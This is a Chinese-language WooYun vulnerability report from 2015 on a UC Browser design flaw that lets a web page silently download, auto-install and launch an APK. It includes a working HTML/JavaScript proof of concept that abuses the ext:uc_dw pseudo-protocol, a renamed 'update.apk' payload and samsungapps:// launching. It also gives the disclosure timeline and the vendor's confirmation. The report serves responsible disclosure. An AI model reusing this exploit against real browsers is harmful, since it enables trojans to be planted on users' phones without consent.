当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154403

漏洞标题:UC浏览器某缺陷可能导致手机被植入木马

相关厂商:UC Mobile

漏洞作者: Lyleaks

提交时间:2015-11-19 23:15

修复时间:2015-12-17 14:48

公开时间:2015-12-17 14:48

漏洞类型:设计错误/逻辑缺陷

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-19: 细节已通知厂商并且等待厂商处理中
2015-11-20: 厂商已经确认,细节仅向厂商公开
2015-11-23: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2016-01-14: 细节向核心白帽子及相关领域专家公开
2016-01-24: 细节向普通白帽子公开
2016-02-03: 细节向实习白帽子公开
2015-12-17: 细节向公众公开

简要描述:

UC浏览器某缺陷可能导致手机被植入木马

详细说明:

前几天更新到最新版的UC浏览器之后,发现UC增加了一个新功能,自动安装应用。测试之后发现结合之前的一个洞可实现点击一个链接自动下载安装并启动APP。
新版的UC浏览器在下载完app之后会提示用户开启自动安装功能

Screenshot_2015-11-17-15-06-13.png


Screenshot_2015-11-17-15-06-36.png


只要开启了该功能,下载完app就会自动安装。之前发过一个洞可以让UC浏览器自动下载APP http://**.**.**.**/bugs/wooyun-2010-0106283
之前说需要用到一个**.**.**.**域下的URL重定向,后来发现并不需要。只要让浏览器打开一个**.**.**.**域下的窗口,然后让该窗口跳到ext:uc_dw就行了。

w = window.open("http://www.**.**.**.**");
w.location.href = "ext:uc_dw:download_url";


但是如果下载地址不是**.**.**.**域下,还是会弹出下载确认框。这个可以使用UC自带的分享功能,把下载链接分享到QQ,就能得到一个**.**.**.**域下的短链接http://fxt1.**.**.**.**/11_1dp9T。但是通过该短链接下载的文件,文件名为11_1dp9T,所以需要想办法自定义下载文件名。通过查看UC的代码,发现UC会将ext:uc_dw:后的内容使用|分割,分别作为下载地址,文件名,cookies等。

ext:uc_dw:download_url|filename|download_cookies|download_taskrefuri


所以也就可以自定义下载的文件名了,这样就完成了自动下载APP。
要让安装后的APP自动启动可以使用伪协议,但是因为UC把自定义的伪协议都拦截了,所以也不能使用Intent来启动。但是对于非三星的手机依然可以用伪协议来启动,因为在UC的代码中发现还有samsungapps://可以使用。三星手机应该也可以通过写成UC的插件来通过网页启动,具体还没测试。

3.png


所以构造POC如下:

<body>
<h1>DEMO</h1>
<a href=javascript:foo()>Click</a>
<iframe id="uc" style=display:none></iframe>
</body>
<script>
var w;
var t;

function foo(){
w = window.open("http://www.**.**.**.**");
t = setInterval('bar()',100);
setTimeout('baz()', 1000);
}
function bar(){
if (w.location.href !== 'about:blank') {
w.location.href = "ext:uc_dw:http://fxt1.**.**.**.**/11_1dp9T|update.apk|";
clearInterval(t);
}
}
function baz() {
frame = document.getElementById("uc");
frame.src = "samsungapps://";
setTimeout('baz()', 1000);
}
</script>


漏洞证明:

演示视频:
链接: http://**.**.**.**/s/1jG8PUuy 密码: uw2r
POC地址:
http://utf7.ml/t/ucdemo.html

修复方案:

版权声明:转载请注明来源 Lyleaks@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-11-20 17:19

厂商回复:

您好,漏洞已确认,正在修复中。感谢您对阿里巴巴安全的关注和支持。

最新状态:

暂无